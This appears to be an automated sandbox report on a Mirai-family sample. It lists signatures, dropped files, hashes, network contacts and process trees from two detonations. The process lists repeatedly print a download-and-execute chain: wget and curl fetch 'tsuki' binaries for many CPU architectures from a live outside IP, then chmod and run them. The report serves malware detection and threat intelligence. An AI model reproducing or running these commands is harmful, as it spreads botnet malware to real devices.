Analysis Overview
SHA256
95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae
Threat Level: Known bad
The file 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae was found to be: Known bad.
Malicious Activity Summary
Mirai
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-22 00:17
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-22 00:17
Reported
2024-07-22 00:20
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
21s
Max time network
128s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tsuki.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki | /tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae | N/A |
| File opened for modification | /tmp/tsuki.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.m68k | /usr/bin/wget | N/A |
Processes
/tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae
[/tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.x86]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.x86]
/bin/cat
[cat tsuki.x86]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.mips]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.mips]
/bin/cat
[cat tsuki.mips]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.mips tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.mpsl]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.mpsl]
/bin/cat
[cat tsuki.mpsl]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm]
/bin/cat
[cat tsuki.arm]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.arm tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm5]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm5]
/bin/cat
[cat tsuki.arm5]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.arm tsuki.arm5 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm6]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm6]
/bin/cat
[cat tsuki.arm6]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm7]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm7]
/bin/cat
[cat tsuki.arm7]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.ppc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.ppc]
/bin/cat
[cat tsuki.ppc]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.m68k]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.m68k]
/bin/cat
[cat tsuki.m68k]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.spc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.spc]
/bin/cat
[cat tsuki.spc]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.i686]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.i686]
/bin/cat
[cat tsuki.i686]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.sh4]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.sh4]
/bin/cat
[cat tsuki.sh4]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arc]
/bin/cat
[cat tsuki.arc]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae config-err-CgvOrA netplan_7v52snic snap-private-tmp ssh-J4eYhaVHucOf systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-bolt.service-Z9x1ht systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-colord.service-jiD6Ry systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-ModemManager.service-djkTkT systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-resolved.service-HWFks7 systemd-private-35a9e6089aec41e0a8e35ac0b8f75ce2-systemd-timedated.service-5u2DY0 tsuki tsuki.arc tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
Network
| Country | Destination | Domain | Proto |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| US | 151.101.193.91:443 | | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| GB | 195.181.164.14:443 | | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
Files
/tmp/tsuki.x86
| MD5 | f60ada8b79c2232773b9c08868c1c5fb |
| SHA1 | 8752a84f5cc638e0a87ffa7bb28d4a9661fcbefa |
| SHA256 | 2d1fd93daf8cadaf775a8cd4e21f8b7b1759442bd260eb6dde3aee319adae117 |
| SHA512 | 71fe4806ac06da9a8d704bbabcc7dc7d0d7e087b420ea81923c888f0f8836b455e790899504729611e883e597a31c5eb7298c4cd5f442117cc799f98102eb9e8 |
/tmp/tsuki
| MD5 | 6cf78b3572c325d809ad4677c2ebd6a2 |
| SHA1 | be2f27c2b001f981344e52333568cb0dc7ffe7ad |
| SHA256 | c6603610d98124953b9b6e4355611cb0588507a8a003aff36771937b43e2acd0 |
| SHA512 | bcb15e53b55134cefcf8de2c0fd28fee6154dc63bc053007f581cec3bc024052b663eed5ce2f3eea3c3b7749d2f4e7a5b0ed013c489bc1c28755d82bebea8a24 |
/tmp/tsuki
| MD5 | 2cf4b7e9a6fa11dbff627fc7aeee3f97 |
| SHA1 | 0cbc6d981a4d7ce2650ebe9aba5ec89a8377fefb |
| SHA256 | eb2c0d50d32ebf8d18e82dd780c2432f4010e5dd8f0cc84c04a10f03f8399a6d |
| SHA512 | 18272662786616a679ed85164c4fa7fe2a865f8c4eedde57403f8fd197c34b356ff3a62155ea9069f2e1f172c4545c29db4c3144c9932f90bdea5a4f14141f57 |
/tmp/tsuki
| MD5 | 3cd8418ac8f414def6727fe141d328b9 |
| SHA1 | dc61b74e9e08ff3208ee96a6c94f8247e6196b99 |
| SHA256 | cbe3077abc42c9e725ee561b8e369c9e5b3819d762d8fa9889b27c1e10dfb8b3 |
| SHA512 | 98d72d05b5b65fac98ed3b448ebf73786040da5aebbe56c060781f78638e75e62ad8801618874c4c17c13cd59bab93f58a31b565a350ac118257d2a0a21409b9 |
/tmp/tsuki
| MD5 | eeed291445ee3e6bac53540dfd6cd91c |
| SHA1 | afc1907c25cf19a1ecf3e83fcd1f7cc72d085f41 |
| SHA256 | 43953e23b49d467cd6b2e40603c2465769cd1620706ef52fecc71777f9964f78 |
| SHA512 | ee610ac06ef742dbf5b616c72b30a32b64a2873272cbf297367de20563bf405b183842fb5e2012f29d5ee11e6ee10e97a90ec915ffb659f22439f7c1ca21d283 |
/tmp/tsuki
| MD5 | adf30c84e4d1a741bb51593fa750d624 |
| SHA1 | ca52225d16c403e9e6ab662e8dab63496281945d |
| SHA256 | 96de1caeeddeba6420add3efbba3e360a13b9956a32be4ee1d4464129154e806 |
| SHA512 | 9ce9154a018aa53c49403c1919cb223f066821a22a9692cbb1defd185098842d8ded4f0a3f17cd6017367ea1357c41295c9f199d1148998f7283f511244db846 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-22 00:17
Reported
2024-07-22 00:20
Platform
debian9-armhf-20240611-en
Max time kernel
37s
Max time network
65s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tsuki.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki | /tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae | N/A |
| File opened for modification | /tmp/tsuki.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arc | /usr/bin/curl | N/A |
Processes
/tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae
[/tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.x86]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.x86]
/bin/cat
[cat tsuki.x86]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.mips]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.mips]
/bin/cat
[cat tsuki.mips]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.mips tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.mpsl]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.mpsl]
/bin/cat
[cat tsuki.mpsl]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm]
/bin/cat
[cat tsuki.arm]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.arm tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm5]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm5]
/bin/cat
[cat tsuki.arm5]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.arm tsuki.arm5 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm6]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm6]
/bin/cat
[cat tsuki.arm6]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
